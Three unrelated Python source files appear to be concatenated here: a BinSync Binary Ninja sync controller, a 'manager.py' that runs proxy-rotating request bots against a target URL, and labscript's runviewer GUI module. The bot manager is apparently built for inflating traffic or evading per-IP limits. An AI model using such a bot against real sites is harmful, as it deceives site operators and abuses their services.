"Please navigate to a function in the disassembly view.",
MessageBoxButtonSet.OKButtonSet,
MessageBoxIcon.ErrorIcon,
)
return None
return func
@init_checker
@make_ro_state
def fill_function(self, bn_func: binaryninja.function.Function, user=None, state=None) -> None:
"""
Grab all relevant information from the specified user and fill the @bn_func.
"""
_func = self.pull_function(bn_func, user=user, state=state)
if _func is None:
return
# name
bn_func.name = _func.name
# comments
for _, ins_addr in bn_func.instructions:
_comment = self.pull_comment(bn_func.start, ins_addr, user=user, state=state)
if _comment is not None:
bn_func.set_comment_at(ins_addr, _comment.comment)
# stack variables
existing_stack_vars: Dict[int, Any] = dict((v.storage, v) for v in bn_func.stack_layout
if v.source_type == VariableSourceType.StackVariableSourceType)
for offset, stack_var in self.pull_stack_variables(bn_func, user=user, state=state).items():
bn_offset = stack_var.get_offset(StackOffsetType.BINJA)
# skip if this variable already exists
type_, _ = bn_func.view.parse_type_string(stack_var.type)
if bn_offset in existing_stack_vars \
and existing_stack_vars[bn_offset].name == stack_var.name \
and existing_stack_vars[bn_offset].type == type_:
continue
            if bn_offset not in existing_stack_vars:
                # no local stack variable at this offset to update; skip it
                continue
            existing_stack_vars[bn_offset].name = stack_var.name
            last_type = existing_stack_vars[bn_offset].type
#print(f"LAST TYPE: {last_type}")
try:
bn_func.create_user_stack_var(bn_offset, last_type, stack_var.name)
bn_func.create_auto_stack_var(bn_offset, last_type, stack_var.name)
except Exception as e:
print(f"[BinSync]: Could not sync stack variable {bn_offset}: {e}")
bn_func.reanalyze()
print(f"[Binsync]: New data synced for \'{user}\' on function {hex(bn_func.start)}.")
#
# Pushers
#
@init_checker
@make_state
def push_function(self, bn_func: binaryninja.function.Function, user=None, state=None):
# Push function
func = binsync.data.Function(
int(bn_func.start)
) # force conversion from long to int
func.name = bn_func.name
state.set_function(func)
@init_checker
@make_state
def push_patch(self, patch, user=None, state=None):
state.set_patch(patch.offset, patch)
@init_checker
@make_state
def push_stack_variable(self, bn_func: binaryninja.Function, stack_var: binaryninja.function.Variable,
user=None, state=None):
if stack_var.source_type != VariableSourceType.StackVariableSourceType:
raise TypeError("Unexpected source type %s of the variable %r." % (stack_var.source_type, stack_var))
type_str = stack_var.type.get_string_before_name()
size = stack_var.type.width
v = StackVariable(stack_var.storage,
StackOffsetType.BINJA,
stack_var.name,
type_str,
size,
bn_func.start)
state.set_stack_variable(v, stack_var.storage, bn_func.start)
@init_checker
@make_state
def push_stack_variables(self, bn_func, user=None, state=None):
for stack_var in bn_func.stack_layout:
# ignore all unnamed variables
# TODO: Do not ignore re-typed but unnamed variables
if re.match(r"var_\d+[_\d+]{0,1}", stack_var.name) \
or stack_var.name in {
'__saved_rbp', '__return_addr',
}:
continue
if not stack_var.source_type == VariableSourceType.StackVariableSourceType:
continue
self.push_stack_variable(bn_func, stack_var, state=state, user=user)
@init_checker
@make_state
def remove_all_comments(self, bn_func: binaryninja.function.Function, user=None, state=None) -> None:
for _, ins_addr in bn_func.instructions:
if ins_addr in state.comments:
state.remove_comment(ins_addr)
@init_checker
@make_state
def push_comments(self, func, comments: Dict[int,str], user=None, state=None) -> None:
# Push comments
for addr, comment in comments.items():
cmt = binsync.data.Comment(func.start, int(addr), comment, decompiled=True)
state.set_comment(cmt)
#
# Pullers
#
@init_checker
@make_ro_state
def pull_stack_variables(self, bn_func, user=None, state=None) -> Dict[int,StackVariable]:
try:
return {k: v for k, v in state.get_stack_variables(bn_func.start)}
except KeyError:
return { }
@init_checker
@make_ro_state
def pull_stack_variable(self, bn_func, offset: int, user=None, state=None) -> StackVariable:
return state.get_stack_variable(bn_func.start, offset)
@init_checker
@make_ro_state
def pull_function(self, bn_func, user=None, state=None) -> Optional[Function]:
"""
Pull a function downwards.
:param bv:
:param bn_func:
:param user:
:return:
"""
# pull function
try:
func = state.get_function(int(bn_func.start))
return func
except KeyError:
return None
@init_checker
@make_ro_state
def pull_comment(self, func_addr, addr, user=None, state=None) -> Optional[str]:
"""
Pull comments downwards.
:param bv:
:param start_addr:
:param end_addr:
:param user:
:return:
"""
try:
return state.get_comment(func_addr, addr)
except KeyError:
return None
@init_checker
@make_ro_state
def pull_comments(self, func_addr, user=None, state=None) -> Optional[Iterable[str]]:
"""
Pull comments downwards.
:param bv:
:param start_addr:
:param end_addr:
:param user:
:return:
"""
return state.get_comments(func_addr)
@staticmethod
def _parse_and_display_connection_warnings(warnings):
warning_text = ""
for warning in warnings:
if warning == ConnectionWarnings.HASH_MISMATCH:
warning_text += "Warning: the hash stored for this BinSync project does not match"
warning_text += " the hash of the binary you are attempting to analyze. It's possible"
warning_text += " you are working on a different binary.\n"
if len(warning_text) > 0:
QMessageBox.warning(
None,
"BinSync: Connection Warnings",
warning_text,
QMessageBox.Ok,
)
@staticmethod
def friendly_datetime(time_before):
# convert
if isinstance(time_before, int):
dt = datetime.datetime.fromtimestamp(time_before)
elif isinstance(time_before, datetime.datetime):
dt = time_before
else:
return ""
now = datetime.datetime.now()
if dt <= now:
diff = now - dt
ago = True
else:
diff = dt - now
ago = False
diff_days = diff.days
diff_sec = diff.seconds
if diff_days >= 1:
s = "%d days" % diff_days
elif diff_sec >= 60 * 60:
s = "%d hours" % int(diff_sec / 60 / 60)
elif diff_sec >= 60:
s = "%d minutes" % int(diff_sec / 60)
else:
s = "%d seconds" % diff_sec
s += " ago" if ago else " in the future"
return s
|
manager.py
|
# Date: 05/10/2018
# Author: Pure-L0G1C
# Description: Manages bots
from .bot import Bot
from .list import List
from .spyder import Spyder
from threading import Thread
from .const import MAX_REQUESTS
class Manager(object):
def __init__(self, threads, url):
self.threads = threads
self.spyder = Spyder()
self.isAlive = True
self.bots = List()
self.url = url
def bot_size_manager(self):
while self.isAlive:
while all([self.isAlive, self.bots.lsize < self.threads]):
try:
                    if self.spyder.proxies.qsize():
proxy = self.spyder.proxies.get()
proxy_addr = { 'https': 'https://{}:{}'.format(proxy['ip'], proxy['port']) }
browser = self.spyder.browser(proxy_addr)
bot = Bot(browser, self.url)
self.bots.add(bot)
except KeyboardInterrupt:
self.isAlive = False
def bot_requests_manager(self):
while self.isAlive:
while all([self.isAlive, self.bots.lsize]):
try:
expired = [] # expired bots
for _ in range(self.bots.lsize):
bot = self.bots.get_item(_)
if bot.requests >= MAX_REQUESTS:
expired.append(_)
                    for _ in sorted(expired, reverse=True):  # remove the highest index first
self.bots.remove(_)
except KeyboardInterrupt:
self.isAlive = False
def start(self):
bot_size = Thread(target=self.bot_size_manager)
spyder = Thread(target=self.spyder.proxy_manager)
bot_requests = Thread(target=self.bot_requests_manager)
bot_requests.daemon = True
bot_size.daemon = True
spyder.daemon = True
spyder.start()
bot_size.start()
bot_requests.start()
def stop(self):
self.isAlive = False
self.spyder.isAlive = False
|
__main__.py
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2014, Monash University #
# #
# This file is part of the program runviewer, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
import os
import sys
import time
import threading
import logging
import ctypes
import socket
if PY2:
str = unicode
from Queue import Queue
else:
from queue import Queue
import ast
import pprint
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
import labscript_utils.excepthook
# Set working directory to runviewer folder, resolving symlinks
runviewer_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runviewer_dir)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.6.1', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.2', '3')
from labscript_utils.setup_logging import setup_logging
logger = setup_logging('runviewer')
labscript_utils.excepthook.set_logger(logger)
from zprocess import zmq_get, ZMQServer
import zprocess.locking
import labscript_utils.h5_lock
import h5py
zprocess.locking.set_client_process_name('runviewer')
# This version check must be deferred until after the h5_lock import
# This is because the check imports pyqtgraph, which imports h5py
# h5py must be imported after h5_lock, thus we do the check here
check_version('pyqtgraph', '0.9.10', '1')
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils.qt.QtCore import pyqtSignal as Signal
import numpy
from scipy import interpolate
# must be imported after PySide/PyQt4
import pyqtgraph as pg
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
from qtutils import *
import qtutils.icons
from labscript_utils.connections import ConnectionTable
import labscript_devices
from labscript_utils.labconfig import LabConfig, config_prefix
from runviewer.resample import resample as _resample
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runviewer.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runviewer']
set_appusermodel(window_id, appids['runviewer'], icon_path, relaunch_command, relaunch_display_name)
SHOT_MODEL__COLOUR_INDEX = 0
SHOT_MODEL__SHUTTER_INDEX = 1
SHOT_MODEL__CHECKBOX_INDEX = 2
SHOT_MODEL__PATH_INDEX = 1
CHANNEL_MODEL__CHECKBOX_INDEX = 0
CHANNEL_MODEL__CHANNEL_INDEX = 0
def format_time(input_sec):
    # input is the time in seconds
if input_sec >= 1:
return "{:.3g}s".format(input_sec)
elif input_sec >= 1e-3:
return "{:.3g}ms".format(input_sec * 1e3)
elif input_sec >= 1e-6:
return "{:.3g}us".format(input_sec * 1e6)
elif input_sec >= 1e-9:
return "{:.3g}ns".format(input_sec * 1e9)
elif input_sec >= 1e-12:
return "{:.3g}ps".format(input_sec * 1e12)
elif input_sec >= 1e-15:
return "{:.3g}fs".format(input_sec * 1e15)
elif input_sec >= 1e-18:
return "{:.3g}as".format(input_sec * 1e18)
else:
return str(input_sec) + "s"
def int_to_enum(enum_list, value):
"""stupid hack to work around the fact that PySide screws with the type of a variable when it goes into a model. Enums are converted to ints, which then
can't be interpreted by QColor correctly (for example)
unfortunately Qt doesn't provide a python list structure of enums, so you have to build the list yourself.
"""
for item in enum_list:
if item == value:
return item
return value
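    # Illustrative use, assuming the usual Qt behaviour where enum members compare equal to their
    # integer values: int_to_enum([Qt.red, Qt.green, Qt.blue], int(Qt.green)) returns the Qt.green
    # enum member itself, which QColor() can then interpret correctly.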
class ScaleHandler():
def __init__(self, input_times, stop_time):
        # input_times is a list (possibly unsorted) of marker times which should end up evenly spaced
        # on the scaled axis. 0 and stop_time are added if missing, and the sorted times are then mapped
        # onto equally spaced scaled times spanning [0, stop_time]; times in between are interpolated linearly.
        # For example, input_times of [1, 2, 4, 6] with stop_time 6 maps the unscaled times
        # [0, 1, 2, 4, 6] onto the scaled times [0, 1.5, 3, 4.5, 6], so that:
        # get_scaled_time(1) -> 1.5
        # get_scaled_time(3) -> 3.75
        # get_scaled_time(5) -> 5.25
self.org_stop_time = float(stop_time)
if 0 not in input_times:
input_times.append(0)
if self.org_stop_time not in input_times:
input_times.append(self.org_stop_time)
if not all((x >= 0) and (x <= self.org_stop_time) for x in input_times):
raise Exception('shot contains at least one marker before t=0 and/or after the stop time. Non-linear time currently does not support this.')
unscaled_times = sorted(input_times)
target_length = self.org_stop_time / float(len(unscaled_times)-1)
scaled_times = [target_length*i for i in range(len(input_times))]
# append values for linear scaling before t=0 and after stop time
unscaled_times = [-1e-9] + unscaled_times + [self.org_stop_time + 1e-9]
scaled_times = [-1e-9] + scaled_times + [self.org_stop_time + 1e-9]
self.get_scaled_time = interpolate.interp1d(unscaled_times, scaled_times, assume_sorted=False, bounds_error=False, fill_value='extrapolate')
self.get_unscaled_time = interpolate.interp1d(scaled_times, unscaled_times, assume_sorted=False, bounds_error=False, fill_value='extrapolate')
self.scaled_stop_time = self.get_scaled_time(self.org_stop_time)
class ColourDelegate(QItemDelegate):
def __init__(self, view, *args, **kwargs):
QItemDelegate.__init__(self, *args, **kwargs)
self._view = view
self._colours = [Qt.black, Qt.red, Qt.green, Qt.blue, Qt.cyan, Qt.magenta, Qt.yellow, Qt.gray, Qt.darkRed, Qt.darkGreen, Qt.darkBlue, Qt.darkCyan, Qt.darkMagenta, Qt.darkYellow, Qt.darkGray, Qt.lightGray]
self._current_colour_index = 0
def get_next_colour(self):
colour = self._colours[self._current_colour_index]
self._current_colour_index += 1
if self._current_colour_index >= len(self._colours):
self._current_colour_index = 0
return colour
def createEditor(self, parent, option, index):
editor = QComboBox(parent)
#colours = QColor.colorNames()
for colour in self._colours:
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
editor.addItem(QIcon(pixmap), '', colour)
editor.activated.connect(lambda index, editor=editor: self._view.commitData(editor))
editor.activated.connect(lambda index, editor=editor: self._view.closeEditor(editor, QAbstractItemDelegate.NoHint))
QTimer.singleShot(10, editor.showPopup)
return editor
def setEditorData(self, editor, index):
value = index.model().data(index, Qt.UserRole)
for i in range(editor.count()):
if editor.itemData(i) == value():
editor.setCurrentIndex(i)
break
def setModelData(self, editor, model, index):
icon = editor.itemIcon(editor.currentIndex())
colour = editor.itemData(editor.currentIndex())
# Note, all data being written to the model must be read out of the editor PRIOR to calling model.setData()
# This is because a call to model.setData() triggers setEditorData(), which messes up subsequent
# calls to the editor to determine the currently selected item/data
model.setData(index, icon, Qt.DecorationRole)
model.setData(index, lambda clist=self._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
def updateEditorGeometry(self, editor, option, index):
editor.setGeometry(option.rect)
class RunviewerMainWindow(QMainWindow):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def event(self, event):
result = QMainWindow.event(self, event)
if event.type() == QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunViewer(object):
def __init__(self, exp_config):
self.ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'main.ui'), RunviewerMainWindow())
# setup shot treeview model
self.shot_model = QStandardItemModel()
self.shot_model.setHorizontalHeaderLabels(['colour', 'shutters', 'path'])
self.ui.shot_treeview.setModel(self.shot_model)
self.ui.shot_treeview.resizeColumnToContents(1)
self.shot_model.itemChanged.connect(self.on_shot_selection_changed)
self.shot_colour_delegate = ColourDelegate(self.ui.shot_treeview)
self.ui.shot_treeview.setItemDelegateForColumn(0, self.shot_colour_delegate)
# setup channel treeview model
self.channel_model = QStandardItemModel()
self.channel_model.setHorizontalHeaderLabels(['channel'])
self.ui.channel_treeview.setModel(self.channel_model)
self.channel_model.itemChanged.connect(self.update_plots)
        # create a hidden plot widget that all plots can link their x-axis to
hidden_plot = pg.PlotWidget(name='runviewer - time axis link')
hidden_plot.setMinimumHeight(1)
hidden_plot.setMaximumHeight(1)
hidden_plot.setLabel('bottom', 'Time', units='s')
hidden_plot.setLabel('left', " ")
hidden_plot.showAxis('right', True)
hidden_plot_item = hidden_plot.plot([0, 1], [0, 0])
self._hidden_plot = (hidden_plot, hidden_plot_item)
self.ui.hidden_plot_layout.addWidget(hidden_plot)
time_axis_plot = pg.PlotWidget()
time_axis_plot.setMinimumHeight(120)
time_axis_plot.setMaximumHeight(120)
time_axis_plot.setLabel('bottom', 'Time', units='s')
time_axis_plot.showAxis('right', True)
time_axis_plot.setXLink('runviewer - time axis link')
time_axis_plot.setMouseEnabled(y=False)
time_axis_plot.getAxis('left').setTicks([]) # hide y ticks in the left & right side. only show time axis
time_axis_plot.getAxis('right').setTicks([])
time_axis_plot.setLabel('left', 'Slots')
time_axis_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, time_axis_plot, "Slots"))
time_axis_plot_item = time_axis_plot.plot([0, 1], [0, 0], pen=(255, 255, 255))
self._time_axis_plot = (time_axis_plot, time_axis_plot_item)
self.all_markers = {}
self.all_marker_items = {}
markers_plot = pg.PlotWidget(name='runviewer - markers')
markers_plot.setMinimumHeight(120)
markers_plot.setMaximumHeight(120)
markers_plot.showAxis('top', False)
markers_plot.showAxis('bottom', False)
markers_plot.showAxis('left', True)
markers_plot.showAxis('right', True)
markers_plot.getAxis('left').setTicks([])
markers_plot.getAxis('right').setTicks([])
markers_plot.setLabel('left', 'Markers')
markers_plot.setXLink('runviewer - time axis link')
markers_plot.setMouseEnabled(y=False)
markers_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, markers_plot, "Markers"))
markers_plot_item = markers_plot.plot([])
self._markers_plot = (markers_plot, markers_plot_item)
self.ui.verticalLayout_9.insertWidget(1,markers_plot)
self.ui.plot_layout.addWidget(time_axis_plot)
# add some icons
self.ui.add_shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.remove_shots.setIcon(QIcon(':/qtutils/fugue/minus'))
self.ui.enable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box'))
self.ui.disable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box-uncheck'))
self.ui.group_channel.setIcon(QIcon(':/qtutils/fugue/layers-group'))
self.ui.delete_group.setIcon(QIcon(':/qtutils/fugue/layers-ungroup'))
self.ui.channel_move_to_top.setIcon(QIcon(':/qtutils/fugue/arrow-stop-090'))
self.ui.channel_move_up.setIcon(QIcon(':/qtutils/fugue/arrow-090'))
self.ui.channel_move_down.setIcon(QIcon(':/qtutils/fugue/arrow-270'))
self.ui.channel_move_to_bottom.setIcon(QIcon(':/qtutils/fugue/arrow-stop-270'))
self.ui.reset_x_axis.setIcon(QIcon(':/qtutils/fugue/clock-history'))
self.ui.reset_y_axis.setIcon(QIcon(':/qtutils/fugue/magnifier-history'))
self.ui.toggle_tooltip.setIcon(QIcon(':/qtutils/fugue/ui-tooltip-balloon'))
self.ui.non_linear_time.setIcon(QIcon(':/qtutils/fugue/ui-ruler'))
self.ui.actionOpen_Shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.actionQuit.setIcon(QIcon(':/qtutils/fugue/cross-button'))
self.ui.actionLoad_channel_config.setIcon(QIcon(':/qtutils/fugue/folder-open'))
self.ui.actionSave_channel_config.setIcon(QIcon(':/qtutils/fugue/disk'))
# disable buttons that are not yet implemented to help avoid confusion!
self.ui.group_channel.setEnabled(False)
self.ui.delete_group.setEnabled(False)
# connect signals
self.ui.reset_x_axis.clicked.connect(self.on_x_axis_reset)
self.ui.reset_y_axis.clicked.connect(self.on_y_axes_reset)
self.ui.channel_move_up.clicked.connect(self._move_up)
self.ui.channel_move_down.clicked.connect(self._move_down)
self.ui.channel_move_to_top.clicked.connect(self._move_top)
self.ui.channel_move_to_bottom.clicked.connect(self._move_bottom)
self.ui.enable_selected_shots.clicked.connect(self._enable_selected_shots)
self.ui.disable_selected_shots.clicked.connect(self._disable_selected_shots)
self.ui.add_shot.clicked.connect(self.on_add_shot)
self.ui.markers_comboBox.currentIndexChanged.connect(self._update_markers)
self.ui.non_linear_time.toggled.connect(self._toggle_non_linear_time)
self.ui.remove_shots.clicked.connect(self.on_remove_shots)
self.ui.actionOpen_Shot.triggered.connect(self.on_add_shot)
self.ui.actionQuit.triggered.connect(self.ui.close)
self.ui.actionLoad_channel_config.triggered.connect(self.on_load_channel_config)
self.ui.actionSave_channel_config.triggered.connect(self.on_save_channel_config)
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.show()
# internal variables
#self._channels_list = {}
self.plot_widgets = {}
self.plot_items = {}
self.shutter_lines = {}
try:
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
except LabConfig.NoOptionError:
exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
if not os.path.exists(self.default_config_path):
os.makedirs(self.default_config_path)
self.last_opened_shots_folder = exp_config.get('paths', 'experiment_shot_storage')
# start resample thread
self._resample = False
self._thread = threading.Thread(target=self._resample_thread)
self._thread.daemon = True
self._thread.start()
# start shots_to_process_queue monitoring thread
self._shots_to_process_thread = threading.Thread(target=self._process_shots)
self._shots_to_process_thread.daemon = True
self._shots_to_process_thread.start()
self.scale_time = False
self.scalehandler = None
def _update_markers(self, index):
for line, plot in self.all_marker_items.items():
plot.removeItem(line)
self.all_marker_items = {}
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
self.all_markers = shot.markers if index > 0 else {}
self._update_non_linear_time(changed_shot=True)
times = sorted(list(self.all_markers.keys()))
for i, (t, m) in enumerate(sorted(self.all_markers.items())):
if i < len(times)-1:
delta_t = times[i+1] - t
else:
delta_t = shot.stop_time - t
if self.scale_time:
t = self.scalehandler.get_scaled_time(t)
color = m['color']
color = QColor(color[0], color[1], color[2])
label = m['label'].decode() if isinstance( m['label'], bytes) else str(m['label'])
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]} )
self.all_marker_items[line] = self._markers_plot[0]
line = self._time_axis_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=format_time(delta_t), labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]} )
self.all_marker_items[line] = self._time_axis_plot[0]
self.update_plots()
def mouseMovedEvent(self, position, ui, name):
if self.ui.toggle_tooltip.isChecked():
v = ui.scene().views()[0]
viewP = v.mapFromScene(position)
glob_pos = ui.mapToGlobal(viewP) # convert to Screen x
glob_zero = ui.mapToGlobal(QPoint(0, 0))
self._global_start_x = glob_zero.x()
self._global_start_y = glob_zero.y()
self._global_width = ui.width()
self._global_height = ui.height()
coord_pos = ui.plotItem.vb.mapSceneToView(position)
if len(self.get_selected_shots_and_colours()) > 0:
if self.scale_time and self.scalehandler is not None:
unscaled_t = float(self.scalehandler.get_unscaled_time(coord_pos.x()))
else:
unscaled_t = float(coord_pos.x())
if unscaled_t is not None:
pos = QPoint(glob_pos.x(), glob_pos.y())
plot_data = ui.plotItem.listDataItems()[0].getData()
if plot_data[0] is not None and unscaled_t is not None:
nearest_index = numpy.abs(plot_data[0] - unscaled_t).argmin() - 1
y_val = "{:.2f}".format(plot_data[1][nearest_index])
else:
y_val = '-'
text = "Plot: {} \nTime: {:.9f}s\nValue: {}".format(name, unscaled_t, y_val)
QToolTip.showText(pos, text)
def _toggle_non_linear_time(self, state):
self.scale_time = state
self._update_non_linear_time()
def _update_non_linear_time(self, changed_shot=False):
old_scalerhandler = self.scalehandler
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if shot is not None and self.scale_time:
self.scalehandler = shot.scalehandler
else:
self.scalehandler = None
# combine markers and shutter lines
markers = list(self.all_marker_items.keys())
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
markers.append(line)
for line in self.shutter_lines[channel][shot][1]:
markers.append(line)
        # Move all markers/shutter lines to their new positions
for marker in markers:
pos = marker.pos()
if old_scalerhandler is None:
unscaled_x = pos.x()
else:
unscaled_x = old_scalerhandler.get_unscaled_time(pos.x())
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(unscaled_x)
else:
new_x = unscaled_x
pos.setX(new_x)
marker.setPos(pos)
if shot is not None and self.scale_time:
self._time_axis_plot[0].getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
else:
self._time_axis_plot[0].getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
for item in plot.getPlotItem().items:
if isinstance(item, pg.PlotDataItem):
if old_scalerhandler is not None:
unscaled_t = old_scalerhandler.get_unscaled_time(item.xData)
else:
unscaled_t = item.xData
if self.scalehandler is not None:
item.setData(self.scalehandler.get_scaled_time(unscaled_t), item.yData)
else:
item.setData(unscaled_t, item.yData)
self._resample = True
def _process_shots(self):
while True:
filepath = shots_to_process_queue.get()
inmain_later(self.load_shot, filepath)
def on_load_channel_config(self):
config_file = QFileDialog.getOpenFileName(self.ui, "Select file to load", self.default_config_path, "Config files (*.ini)")
if isinstance(config_file, tuple):
config_file, _ = config_file
if config_file:
runviewer_config = LabConfig(config_file)
try:
channels = ast.literal_eval(runviewer_config.get('runviewer_state', 'Channels'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
channels = {}
for row, (channel, checked) in enumerate(channels):
check_items = self.channel_model.findItems(channel)
if len(check_items) == 0:
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
items.append(check_item)
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
check_item.setEnabled(False)
self.channel_model.insertRow(row, items)
else:
check_item = check_items[0]
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
self.channel_model.takeRow(check_item.row())
self.channel_model.insertRow(row, check_item)
def on_save_channel_config(self):
save_file = QFileDialog.getSaveFileName(self.ui, 'Select file to save current channel configuration', self.default_config_path, "config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if save_file:
runviewer_config = LabConfig(save_file)
channels = []
for row in range(self.channel_model.rowCount()):
item = self.channel_model.item(row)
channels.append((item.text(), item.checkState() == Qt.Checked))
runviewer_config.set('runviewer_state', 'Channels', pprint.pformat(channels))
def on_toggle_shutter(self, checked, current_shot):
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
if shot == current_shot:
for line in self.shutter_lines[channel][shot][0]:
if checked:
line.show()
else:
line.hide()
for line in self.shutter_lines[channel][shot][1]:
if checked:
line.show()
else:
line.hide()
def on_add_shot(self):
selected_files = QFileDialog.getOpenFileNames(self.ui, "Select file to load", self.last_opened_shots_folder, "HDF5 files (*.h5 *.hdf5)")
popup_warning = False
if isinstance(selected_files, tuple):
selected_files, _ = selected_files
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
selected_files = [os.path.abspath(str(shot_file)) for shot_file in selected_files]
if len(selected_files) > 0:
self.last_opened_shots_folder = os.path.dirname(selected_files[0])
for file in selected_files:
try:
filepath = str(file)
# Qt has this weird behaviour where if you type in the name of a file that exists
# but does not have the extension you have limited the dialog to, the OK button is greyed out
# but you can hit enter and the file will be selected.
# So we must check the extension of each file here!
if filepath.endswith('.h5') or filepath.endswith('.hdf5'):
self.load_shot(filepath)
else:
popup_warning = True
except:
popup_warning = True
raise
if popup_warning:
message = QMessageBox()
message.setText("Warning: Some shots were not loaded because they were not valid hdf5 files")
message.setIcon(QMessageBox.Warning)
message.setWindowTitle("Runviewer")
message.setStandardButtons(QMessageBox.Ok)
message.exec_()
def on_remove_shots(self):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
        # Create a list of selected row indices
selected_row_list = [index.row() for index in selection_model.selectedRows()]
# sort in descending order to prevent index changes of rows to be deleted
selected_row_list.sort(reverse=True)
reply = QMessageBox.question(self.ui, 'Runviewer', 'Remove {} shots?'.format(len(selected_row_list)),
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.No:
return
for row in selected_row_list:
item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
shot = item.data()
# unselect shot
item.setCheckState(Qt.Unchecked)
shutter_item.setCheckState(Qt.Unchecked)
# remove row
self.shot_model.removeRow(row)
del shot
def on_shot_selection_changed(self, item):
if self.shot_model.indexFromItem(item).column() == SHOT_MODEL__CHECKBOX_INDEX:
# add or remove a colour for this shot
checked = item.checkState()
row = self.shot_model.indexFromItem(item).row()
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
check_shutter = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
if checked:
colour = colour_item.data(Qt.UserRole)
if colour is not None:
colour = colour()
else:
colour = self.shot_colour_delegate.get_next_colour()
colour_item.setEditable(True)
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
icon = QIcon(pixmap)
colour_item.setData(lambda clist=self.shot_colour_delegate._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
colour_item.setData(icon, Qt.DecorationRole)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(True)
if self.ui.markers_comboBox.currentIndex() == 0:
self.ui.markers_comboBox.setCurrentIndex(shot_combobox_index)
if item.data().shutter_times != {}:
check_shutter.setEnabled(True)
else:
check_shutter.setEnabled(False)
check_shutter.setToolTip("This shot doesn't contain shutter markers")
else:
# colour = None
# icon = None
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
if shot_combobox_index == self.ui.markers_comboBox.currentIndex():
self.ui.markers_comboBox.setCurrentIndex(0)
colour_item.setEditable(False)
check_shutter.setEnabled(False)
# model.setData(index, editor.itemIcon(editor.currentIndex()),
# model.setData(index, editor.itemData(editor.currentIndex()), Qt.UserRole)
self.update_channels_treeview()
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__COLOUR_INDEX:
# update the plot colours
# get reference to the changed shot
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
# find and update the pen of the plot items
for channel in self.plot_items.keys():
